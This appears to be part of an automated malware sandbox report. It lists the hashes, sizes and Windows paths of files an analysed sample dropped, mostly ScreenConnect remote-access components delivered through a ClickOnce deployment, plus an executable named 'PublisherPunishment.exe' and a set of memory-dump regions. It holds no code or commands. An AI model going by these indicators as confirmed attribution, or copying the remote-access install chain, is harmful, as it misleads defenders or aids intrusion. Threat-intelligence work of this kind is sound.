16d7fcfc9a0edbdc21067c629c02dd1e84486b57b531a469c8ac1569b2af2c27

SHA512
3b44490d08b962829130ac30d537ac11de60d537069259fdad6e3588c20c32a9e86f49a5852ad07d1ae16235a738da1f5c1e78c77828766a3be1d0b64fc8dc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Measurement

Filesize
66KB

MD5
528d75f57f1b55759226b354f5c57703

SHA1
ea3db1847af1dd0261b931cfa2af5db61cda681e

SHA256
0dee7c458ddb0eb6b5f045bbbb036f4ba19e1a0fe4966336222c26c264455be9

SHA512
bcd71be15fe2a5d4578985990c5762bd1fa075971e65016b9436044f646beccb3fc06f0642c28a574944c3d0721d0e56812ec3e3e68d3dc7ec67c8090911c56e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Participants

Filesize
227B

MD5
82a38745ff9cefa0859b47b8bd69f535

SHA1
6f97750b298ed3f3910e5aa4044b91e7409db9d2

SHA256
92f1df88e0467d0284f1de3e6d30bcf41b0ed56e055719872754627a2b4bb470

SHA512
d22a5ddfacf8c00cde7c3fa27612ca386ae68f79b9c93b52d40be33d584eaf3c18b100da9ad6ba4efacef1cba4fa5d1665e4c3004454f0eb41c3051b98c60569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Richmond

Filesize
190KB

MD5
3cded99cb29494966e8aa281d3ec1fda

SHA1
9b6864a6b9670e17b621590533ef35e8f15fd8b8

SHA256
854c454502d54603b88126f8e887475f4f585bdff593b0e236d72543fb9c5937

SHA512
0779dec8fdc3d51f3c38078872f2e43382e73db11eede821dce13bd777b79ea4a34a4e1534e241d84b72261b3d702df3afbd8a2f36c89cc3eed548a7d4b38af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Royalty

Filesize
172KB

MD5
03f02c0c856959d4d9d68749134b5c6c

SHA1
da88721ea678a25c618389ddcd924eeab2cbacf4

SHA256
3baf8c4586493096dc6293db4609cb2d56436fa7d590d24f082963f05076cd91

SHA512
c322dbff15eb786d4dee59aa525bc55f1197efdebb33289ed4939f536b5b3abaf5f9aa7d6f12859ea76277f49648933b48c85dfb09763e76d697200c1d144d47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Violence

Filesize
130KB

MD5
059e915ab2aecb510d3ddeb56b1cf163

SHA1
50059dab6a5f5dd1a7e31f2f034fdf9618db4a29

SHA256
53ee555f91f983e85e99dc375b9199b336a26dacbbc42662cfbb0c0edfc191ad

SHA512
7f679181cf4228d6906dec0293362abd12885828b20403f0dba7fa1b1e9c550cc674be0c333f6c2f83123ae15966382724f3c911afccaf781faca3a44fbe35f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Client.dll

Filesize
188KB

MD5
6bc9611d5b6cee698149a18d986547a8

SHA1
f36ab74e4e502fdaf81e101836b94c91d80cb8ea

SHA256
17377a52eeae11e8ee01eb629d6a60c10015ad2bb8bc9768e5c8e4b6500a15ed

SHA512
3f23670d0ba150de19a805db6beb6eed8538bbad6fbe3cc21d17d738a43cf411c679a23cea11549e69be0321e672f740791d40e92498aef9d1f8650743ee85ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Client.dll.genman

Filesize
1KB

MD5
9ce092e164085ce2566f654314bf99dc

SHA1
acef36091ec262a4c42aa5a5b394c71b13b4767e

SHA256
6b36ddce4021fd15c29cf63c7102e60edfe2627d1b00ef97d0b4de3051737439

SHA512
95bd7f9315dc181de529d940e697b652651bc9e954e96fbc059998909259a719af062548c533d24350c25a159cb113f568eb7c622ae3069ce25fb9224ebf02a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.ClientService.dll

Filesize
60KB

MD5
22af3a23bd30484514cdacf67c5b3810

SHA1
e92a4eaee9d896964de541ce2f01c2404b638258

SHA256
7c5442121dba2a30ab9579ec08e111ded372cf9cf90fb3256f273980b975afa9

SHA512
95e40b27e90fce7ca85e76afbbc16eb62b4bb977664702b987de2eb2294e6fe9e6df5610ec7b2362c2c68493313f30fbbcbd3446dbe8ae2fa47b89407f5d5936

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.ClientService.dll.genman

Filesize
1KB

MD5
f94d041a8128be81c4347caf6a3c47bf

SHA1
3285f9acf70c0e4d34f888c28bd3f693e3df5909

SHA256
91a65bacad5f7f70bddc6209ed65dd5c375cef9f3c289eab83fd90d622adf46b

SHA512
90199543207caf9b4501be7e9509dc9526dafcd5602aaed700314763021c8f3ed06d93a31a90a34cb19d4fb7184aa7d154b197f9e535657aeb9eb872da377a41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Core.dll

Filesize
519KB

MD5
b319407e807be1a49e366f7f8ea7ee2a

SHA1
b12197a877fb7e33b1cb5ba11b0da5ca706581ba

SHA256
761b7e50baa229e8afcd9a50990d7f776ddb5ed1ea5fbb131c802e57cf918742

SHA512
dc497643790dc608dece9c8fe7264efedd13724bd24c9bf28a60d848b405fddefb8337a60f3f32bb91518910e02c7a2aaf29fc32f86a464dfcafa365526bdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Core.dll.genman

Filesize
1KB

MD5
6da6dc34636435e9c2bd1b5ff79091b5

SHA1
61b6d8c16330fe9063f041bcc025c10de82d876b

SHA256
98d4edaa86468540d2d17ef17a9bcd7224b128099a51a8f92a65a88950dcb44c

SHA512
0bb929107ecfa257dfb2ff7b37955d8c2402287e989c015632a6292362858667a398ad0563103c1324a29585a8177aaa4bce3c57d867735e40d2cc5c996bd5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Windows.dll

Filesize
1.6MB

MD5
29454a0cb83f28c24805e9a70e53444a

SHA1
334202965b07ab69f08b16fed0ee6c7274463556

SHA256
998cc3f9af5bd41ccf0f9be86192bbe20cdec08a6ff73c1199e1364195a83e14

SHA512
62790920974a2f1b018d466ae3e3b5100006a3c8013f43bdb04af7074cfe5d992caaeb610de2b1b72ff0e4acf8762db1513a4a0cf331f9a340ae0ce53c3be895

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.Windows.dll.genman

Filesize
1KB

MD5
1fb3a39063c9fbbc9252d1224cf8c89d

SHA1
0f0622eb6205f515651e055c17d0067a94308721

SHA256
199c3f5089b07f1fb6cb343180620b2094bcdda9e1f6a3f41269c56402d98439

SHA512
8c70ff2fe2f1935454aa6bb4ce0998da1adcbfe7219f1eaee4688ee86bbc730de30347f39b9b1413cbd345d1bf786491ed2f79142d9333dba3a7f0edc9f48e3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsBackstageShell.exe

Filesize
59KB

MD5
10dba57f22a6ab4039330000570f39f8

SHA1
b8b5c65a89256177da802c4c9cbd11b013221730

SHA256
9bd8d15759f83d99edd1f2617d59a94e1c2bb4bd7c4977958f5d5f22c5a7c469

SHA512
38230b63a4630145608f619d75ca3115c05ab0338fb57566e012df1bd157123a670a37ae0fea92351ab7352319a5af29f9db3f8bb14962f3f0de3a4f5a5b754c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe

Filesize
573KB

MD5
5dec65c4047de914c78816b8663e3602

SHA1
8807695ee8345e37efec43cbc0874277ed9b0a66

SHA256
71602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e

SHA512
27b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.genman

Filesize
2KB

MD5
efa59a7f55af829c3974a02f30ebe80c

SHA1
0faba6763d910d5ee104e3457045c63ccc5bf79b

SHA256
3e2d5cc7867afa23663d5894127ce6e2880d3075773a249b37576eda5088875a

SHA512
72262b09c21dc4a2b2701a5b32c149349fa3107035d5a115eac4335e3961dcf12a7a867aeff595c13aa618ea955b604538c0f4e529cb6a76fff0cb75927cc74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.manifest

Filesize
17KB

MD5
f4b84e283123b025a90bbde33e2080fd

SHA1
cc57bfd02228be76c6e08bde16996fa992ff0e54

SHA256
93f9eb492b6952d8c7aa1ef1ee5a901234ba1fd2d5ef58d24e1faef597ea8e02

SHA512
abc92965bf97c37a614b556d2219d06e63687777d79df5ffb4b5d447dd138c160e5a45cab76a2353d758ad62960f2e58745f0523881ff6c0ea4ccbcd7ed40002

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsFileManager.exe

Filesize
79KB

MD5
c333d3a6eeb74e4d76c3b9e0f6bfd04c

SHA1
a39e2643e8dbd2097829e0b08938726557cb8e36

SHA256
998d7a0cd6b1a837489e55e99cb992088b9fde220a1025346a461849e1f50d22

SHA512
58cc7741ebe1aada93fd82a3e0a571a9a1aa3e400c46e7cdddef876d74f4fbbcbae4293ac556b3823e8dc977e7ce72337a16c2d48eab0aa52b736412ae43c634

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\XL1312AL.YNE\9Y9V2P82.6NQ.application

Filesize
110KB

MD5
75f072db717adf065f2d4ddd705a2d49

SHA1
8165093de1c610b4cd5b301a6237e923170618c2

SHA256
3c7dd342a48bdacb6cc05c422ae960d7baf899593c7a14a075c70f478f17825c

SHA512
ae29ecd9cd13694075681790b909edf50903aa3820cf278889574969d2d954e1001f0bd89da6d4670bc08cbf0cdfcbd2cfc6ffc27e3bd16e0a6f1fc3f73c1517

Download Submit
C:\Users\Admin\Documents\ConnectWiseControl\Temp\PublisherPunishment.exe

Filesize
686KB

MD5
0b637cec0fa710f205a5fd5923db79dd

SHA1
aa41d27a3e61a3c5fbc4688c847c7fb21cb0d5ed

SHA256
f1ef824f1ebe8a26255aa043f73265f5d8aaaf1643a0fda50a1640de3287f80a

SHA512
6b86c61acd9e872beba9e7f0437720a1f846af7387817011d6a996bc19782f37229aeafab7715a8985b04f8dc2b0a35a0bfe7683ff08cf4bef78645f794b1cca

Download Submit
memory/704-394-0x0000000001030000-0x0000000001046000-memory.dmp

Filesize
88KB

Download
memory/1640-441-0x0000000000BE0000-0x0000000000BF6000-memory.dmp

Filesize
88KB

Download
memory/1640-447-0x0000000007050000-0x000000000706E000-memory.dmp

Filesize
120KB

Download
memory/1640-446-0x0000000006F30000-0x0000000006F6E000-memory.dmp

Filesize
248KB

Download
memory/1640-445-0x0000000006FB0000-0x0000000007026000-memory.dmp

Filesize
472KB

Download
memory/1640-444-0x00000000064C0000-0x0000000006526000-memory.dmp

Filesize
408KB

Download
memory/1640-443-0x0000000006420000-0x00000000064BC000-memory.dmp

Filesize
624KB

Download
memory/1640-442-0x00000000057A0000-0x00000000057AA000-memory.dmp

Filesize
40KB

Download
memory/1892-7-0x0000020E4E110000-0x0000020E4E160000-memory.dmp

Filesize
320KB

Download
memory/1892-38-0x0000020E4E910000-0x0000020E4EABA000-memory.dmp

Filesize
1.7MB

Download
memory/1892-32-0x0000020E4C140000-0x0000020E4C1D4000-memory.dmp

Filesize
592KB

Download
memory/1892-1-0x00007FFE30D23000-0x00007FFE30D25000-memory.dmp

Filesize
8KB

Download
memory/1892-44-0x0000020E4C130000-0x0000020E4C1B8000-memory.dmp

Filesize
544KB

Download
memory/1892-22-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

Filesize
10.8MB

Download
memory/1892-438-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

Filesize
10.8MB

Download
memory/1892-4-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

Filesize
10.8MB

Download
memory/1892-50-0x0000020E4BFA0000-0x0000020E4BFD6000-memory.dmp

Filesize
216KB

Download
memory/1892-3-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

Filesize
10.8MB

Download
memory/1892-57-0x0000020E4BF60000-0x0000020E4BF76000-memory.dmp

Filesize
88KB

Download
memory/1892-2-0x0000020E4A6C0000-0x0000020E4A846000-memory.dmp

Filesize
1.5MB

Download
memory/1892-0-0x0000020E300A0000-0x0000020E300A8000-memory.dmp

Filesize
32KB

Download
memory/1892-437-0x00007FFE30D23000-0x00007FFE30D25000-memory.dmp

Filesize
8KB

Download
memory/1928-340-0x0000000000110000-0x00000000001A4000-memory.dmp

Filesize
592KB

Download
memory/1940-382-0x0000000004A40000-0x0000000004FE4000-memory.dmp

Filesize
5.6MB

Download
memory/1940-381-0x00000000042E0000-0x000000000448A000-memory.dmp

Filesize
1.7MB

Download
memory/1940-387-0x0000000004490000-0x0000000004522000-memory.dmp

Filesize
584KB

Download
memory/1940-386-0x00000000041D0000-0x0000000004206000-memory.dmp

Filesize
216KB

Download
memory/1940-383-0x0000000004180000-0x00000000041D0000-memory.dmp

Filesize
320KB

Download
memory/4444-369-0x0000000004B70000-0x0000000004BF8000-memory.dmp

Filesize
544KB

Download
memory/4444-364-0x0000000004A40000-0x0000000004A56000-memory.dmp

Filesize
88KB

Download